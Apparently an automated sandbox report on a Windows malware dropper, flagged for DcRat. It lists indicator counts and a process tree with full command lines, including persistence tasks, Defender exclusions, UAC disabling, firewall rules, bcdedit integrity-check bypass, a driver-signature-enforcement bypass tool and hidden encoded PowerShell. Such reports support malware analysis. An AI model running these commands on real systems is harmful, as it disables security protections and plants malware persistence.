Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

toolspub2.exeRandom.exee0cbefcb1af40c7d4aff4aca26621a98.exe

pid	process
2876	toolspub2.exe
2876	toolspub2.exe
1720	Random.exe
1720	Random.exe
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
2536	e0cbefcb1af40c7d4aff4aca26621a98.exe
1212
1212
1212
1212
1212
1212
1212
1212
1212

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

efvsGwL3XyHtUD0FozEnfzjb.tmp

pid process

1212
2564 efvsGwL3XyHtUD0FozEnfzjb.tmp
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

468
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

toolspub2.exe

pid process

2876 toolspub2.exe

pid	process
1212
2564	efvsGwL3XyHtUD0FozEnfzjb.tmp

pid	process
468

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Random.exeAddInProcess32.exee0cbefcb1af40c7d4aff4aca26621a98.exepowershell.exeozhNpD8L2lpu5PbPP1O3mZf8.exe1WhdhWgOS4WRGRR6OOPxuF3j.exesc.execsrss.exepowershell.EXEpowershell.EXEpowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1720	Random.exe
Token: SeDebugPrivilege	2288	AddInProcess32.exe
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeDebugPrivilege	2536	e0cbefcb1af40c7d4aff4aca26621a98.exe
Token: SeImpersonatePrivilege	2536	e0cbefcb1af40c7d4aff4aca26621a98.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeDebugPrivilege	1576	ozhNpD8L2lpu5PbPP1O3mZf8.exe
Token: SeImpersonatePrivilege	1576	ozhNpD8L2lpu5PbPP1O3mZf8.exe
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeDebugPrivilege	3060	1WhdhWgOS4WRGRR6OOPxuF3j.exe
Token: SeImpersonatePrivilege	3060	1WhdhWgOS4WRGRR6OOPxuF3j.exe
Token: SeDebugPrivilege	1372	sc.exe
Token: SeSystemEnvironmentPrivilege	1788	csrss.exe
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeSecurityPrivilege	1372	sc.exe
Token: SeSecurityPrivilege	1372	sc.exe
Token: SeDebugPrivilege	2664	powershell.EXE
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeDebugPrivilege	1504	powershell.EXE
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeDebugPrivilege	2572	powershell.EXE
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212
Token: SeShutdownPrivilege	1212

Suspicious use of FindShellTrayWindow 32 IoCs

Processes:

pid process

1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
Suspicious use of SendNotifyMessage 8 IoCs

Processes:

pid process

1212
1212
1212
1212
1212
1212
1212
1212

pid	process
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212
1212

pid	process
1212
1212
1212
1212
1212
1212
1212
1212

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.exetoolspub2.exetuc3.exeRandom.exeAddInProcess32.exe

description	pid	process	target process
PID 2072 wrote to memory of 2272	2072	tmp.exe	schtasks.exe
PID 2072 wrote to memory of 2272	2072	tmp.exe	schtasks.exe
PID 2072 wrote to memory of 2272	2072	tmp.exe	schtasks.exe
PID 2072 wrote to memory of 2272	2072	tmp.exe	schtasks.exe
PID 2072 wrote to memory of 3064	2072	tmp.exe	toolspub2.exe
PID 2072 wrote to memory of 3064	2072	tmp.exe	toolspub2.exe
PID 2072 wrote to memory of 3064	2072	tmp.exe	toolspub2.exe
PID 2072 wrote to memory of 3064	2072	tmp.exe	toolspub2.exe
PID 2072 wrote to memory of 2536	2072	tmp.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2072 wrote to memory of 2536	2072	tmp.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2072 wrote to memory of 2536	2072	tmp.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2072 wrote to memory of 2536	2072	tmp.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2072 wrote to memory of 1720	2072	tmp.exe	Random.exe
PID 2072 wrote to memory of 1720	2072	tmp.exe	Random.exe
PID 2072 wrote to memory of 1720	2072	tmp.exe	Random.exe
PID 2072 wrote to memory of 1720	2072	tmp.exe	Random.exe
PID 2072 wrote to memory of 2796	2072	tmp.exe	tuc3.exe
PID 2072 wrote to memory of 2796	2072	tmp.exe	tuc3.exe
PID 2072 wrote to memory of 2796	2072	tmp.exe	tuc3.exe
PID 2072 wrote to memory of 2796	2072	tmp.exe	tuc3.exe
PID 2072 wrote to memory of 2796	2072	tmp.exe	tuc3.exe
PID 2072 wrote to memory of 2796	2072	tmp.exe	tuc3.exe
PID 2072 wrote to memory of 2796	2072	tmp.exe	tuc3.exe
PID 3064 wrote to memory of 2876	3064	toolspub2.exe	toolspub2.exe
PID 3064 wrote to memory of 2876	3064	toolspub2.exe	toolspub2.exe
PID 3064 wrote to memory of 2876	3064	toolspub2.exe	toolspub2.exe
PID 3064 wrote to memory of 2876	3064	toolspub2.exe	toolspub2.exe
PID 2796 wrote to memory of 2816	2796	tuc3.exe	tuc3.tmp
PID 2796 wrote to memory of 2816	2796	tuc3.exe	tuc3.tmp
PID 2796 wrote to memory of 2816	2796	tuc3.exe	tuc3.tmp
PID 2796 wrote to memory of 2816	2796	tuc3.exe	tuc3.tmp
PID 2796 wrote to memory of 2816	2796	tuc3.exe	tuc3.tmp
PID 2796 wrote to memory of 2816	2796	tuc3.exe	tuc3.tmp
PID 2796 wrote to memory of 2816	2796	tuc3.exe	tuc3.tmp
PID 3064 wrote to memory of 2876	3064	toolspub2.exe	toolspub2.exe
PID 3064 wrote to memory of 2876	3064	toolspub2.exe	toolspub2.exe
PID 3064 wrote to memory of 2876	3064	toolspub2.exe	toolspub2.exe
PID 1720 wrote to memory of 960	1720	Random.exe	powershell.exe
PID 1720 wrote to memory of 960	1720	Random.exe	powershell.exe
PID 1720 wrote to memory of 960	1720	Random.exe	powershell.exe
PID 1720 wrote to memory of 960	1720	Random.exe	powershell.exe
PID 1720 wrote to memory of 1564	1720	Random.exe	CasPol.exe
PID 1720 wrote to memory of 1564	1720	Random.exe	CasPol.exe
PID 1720 wrote to memory of 1564	1720	Random.exe	CasPol.exe
PID 1720 wrote to memory of 1564	1720	Random.exe	CasPol.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 1720 wrote to memory of 2288	1720	Random.exe	AddInProcess32.exe
PID 2288 wrote to memory of 3032	2288	AddInProcess32.exe	vHrBJfp6Ae2TplhspiUC4Z2i.exe
PID 2288 wrote to memory of 3032	2288	AddInProcess32.exe	vHrBJfp6Ae2TplhspiUC4Z2i.exe
PID 2288 wrote to memory of 3032	2288	AddInProcess32.exe	vHrBJfp6Ae2TplhspiUC4Z2i.exe
PID 2288 wrote to memory of 3032	2288	AddInProcess32.exe	vHrBJfp6Ae2TplhspiUC4Z2i.exe
PID 2288 wrote to memory of 1756	2288	AddInProcess32.exe	fXxalfBYclw5CFjedzawENWf.exe
PID 2288 wrote to memory of 1756	2288	AddInProcess32.exe	fXxalfBYclw5CFjedzawENWf.exe
PID 2288 wrote to memory of 1756	2288	AddInProcess32.exe	fXxalfBYclw5CFjedzawENWf.exe
PID 2288 wrote to memory of 1756	2288	AddInProcess32.exe	fXxalfBYclw5CFjedzawENWf.exe
PID 2288 wrote to memory of 1756	2288	AddInProcess32.exe	fXxalfBYclw5CFjedzawENWf.exe
PID 2288 wrote to memory of 1756	2288	AddInProcess32.exe	fXxalfBYclw5CFjedzawENWf.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

Random.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Random.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Random.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2072

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tmp.exe /TR "C:\Users\Admin\AppData\Local\Temp\tmp.exe" /F
2⤵
- DcRat
- Creates scheduled task(s)
PID:2272

C:\Users\Admin\AppData\Local\Temp\1000014001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\toolspub2.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3064

C:\Users\Admin\AppData\Local\Temp\1000014001\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\1000014001\toolspub2.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2876

C:\Users\Admin\AppData\Local\Temp\1000015001\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2536

C:\Users\Admin\AppData\Local\Temp\1000015001\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\1000015001\e0cbefcb1af40c7d4aff4aca26621a98.exe"
3⤵
- DcRat
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
PID:2620

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2748

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- DcRat
- Creates scheduled task(s)
PID:2676

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
5⤵
PID:1844

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:2860

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
6⤵
- Modifies boot configuration data using bcdedit
PID:1564

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:1716

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:1812

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
6⤵
- Modifies boot configuration data using bcdedit
PID:2900

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:1876

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:3044

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
6⤵
- Modifies boot configuration data using bcdedit
PID:912

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
6⤵
- Modifies boot configuration data using bcdedit
PID:2912

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
6⤵
- Modifies boot configuration data using bcdedit
PID:2080

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
6⤵
- Modifies boot configuration data using bcdedit
PID:1552

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
6⤵
- Modifies boot configuration data using bcdedit
PID:572

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
6⤵
- Modifies boot configuration data using bcdedit
PID:1296

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
6⤵
- Modifies boot configuration data using bcdedit
PID:2992

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:296

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
5⤵
- Modifies boot configuration data using bcdedit
PID:1948

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
5⤵
- Executes dropped EXE
PID:828

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- DcRat
- Creates scheduled task(s)
PID:1756

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
5⤵
- Executes dropped EXE
PID:2364

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
6⤵
PID:864

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
- Drops file in System32 directory
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1372

C:\Users\Admin\AppData\Local\Temp\1000017001\Random.exe
"C:\Users\Admin\AppData\Local\Temp\1000017001\Random.exe"
2⤵
- UAC bypass
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000017001\Random.exe" -Force
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
3⤵
PID:1564

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
3⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288

C:\Users\Admin\Pictures\vHrBJfp6Ae2TplhspiUC4Z2i.exe
"C:\Users\Admin\Pictures\vHrBJfp6Ae2TplhspiUC4Z2i.exe"
4⤵
- Executes dropped EXE
PID:3032

C:\Users\Admin\Pictures\fXxalfBYclw5CFjedzawENWf.exe
"C:\Users\Admin\Pictures\fXxalfBYclw5CFjedzawENWf.exe" --silent --allusers=0
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1756

C:\Users\Admin\Pictures\ozhNpD8L2lpu5PbPP1O3mZf8.exe
"C:\Users\Admin\Pictures\ozhNpD8L2lpu5PbPP1O3mZf8.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Users\Admin\Pictures\ozhNpD8L2lpu5PbPP1O3mZf8.exe
"C:\Users\Admin\Pictures\ozhNpD8L2lpu5PbPP1O3mZf8.exe"
5⤵
- DcRat
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
6⤵
PID:596

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
7⤵
- Modifies Windows Firewall
PID:3044

C:\Users\Admin\Pictures\1WhdhWgOS4WRGRR6OOPxuF3j.exe
"C:\Users\Admin\Pictures\1WhdhWgOS4WRGRR6OOPxuF3j.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3060

C:\Users\Admin\Pictures\1WhdhWgOS4WRGRR6OOPxuF3j.exe
"C:\Users\Admin\Pictures\1WhdhWgOS4WRGRR6OOPxuF3j.exe"
5⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
PID:2684

C:\Users\Admin\Pictures\efvsGwL3XyHtUD0FozEnfzjb.exe
"C:\Users\Admin\Pictures\efvsGwL3XyHtUD0FozEnfzjb.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2592

C:\Users\Admin\AppData\Local\Temp\is-A7E81.tmp\efvsGwL3XyHtUD0FozEnfzjb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A7E81.tmp\efvsGwL3XyHtUD0FozEnfzjb.tmp" /SL5="$2019C,8449017,54272,C:\Users\Admin\Pictures\efvsGwL3XyHtUD0FozEnfzjb.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
PID:2564

C:\Users\Admin\Pictures\gRvod0KThFz1hzWY7BmbszEA.exe
"C:\Users\Admin\Pictures\gRvod0KThFz1hzWY7BmbszEA.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1816

C:\Users\Admin\AppData\Local\Temp\7zSDD83.tmp\Install.exe
.\Install.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2176

C:\Users\Admin\AppData\Local\Temp\7zSEB39.tmp\Install.exe
.\Install.exe /aDFNJdideJdDp "385118" /S
6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:2472

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
7⤵
PID:1724

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
8⤵
PID:692

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
9⤵
PID:1612

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
9⤵
PID:1324

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
7⤵
PID:3008

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
8⤵
PID:1668

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
9⤵
PID:2612

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
9⤵
PID:2848

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHKMvgRKk" /SC once /ST 05:41:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
7⤵
- DcRat
- Creates scheduled task(s)
PID:1496

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHKMvgRKk"
7⤵
PID:1732

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHKMvgRKk"
7⤵
PID:2520

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bfGojSTCIOPOCXmuYy" /SC once /ST 15:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\guxeHrySFRRzTNNVB\XLcTAETjpZUrTol\zjfYIUu.exe\" 48 /Dssite_idupa 385118 /S" /V1 /F
7⤵
- DcRat
- Creates scheduled task(s)
PID:1328

C:\Users\Admin\AppData\Local\Temp\1000016001\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\1000016001\tuc3.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2796

C:\Users\Admin\AppData\Local\Temp\is-CEJE5.tmp\tuc3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CEJE5.tmp\tuc3.tmp" /SL5="$A011C,8423542,54272,C:\Users\Admin\AppData\Local\Temp\1000016001\tuc3.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:2816

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231201154940.log C:\Windows\Logs\CBS\CbsPersist_20231201154940.cab
1⤵
- Drops file in Windows directory
PID:636

C:\Windows\system32\taskeng.exe
taskeng.exe {B0D9A613-5717-4709-9417-06F1EDF16127} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]
1⤵
PID:2164

C:\Users\Admin\AppData\Local\Temp\tmp.exe
C:\Users\Admin\AppData\Local\Temp\tmp.exe
2⤵
PID:2968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
PID:1372

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:2840

C:\Users\Admin\AppData\Local\Temp\tmp.exe
C:\Users\Admin\AppData\Local\Temp\tmp.exe
2⤵
PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2664

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1296

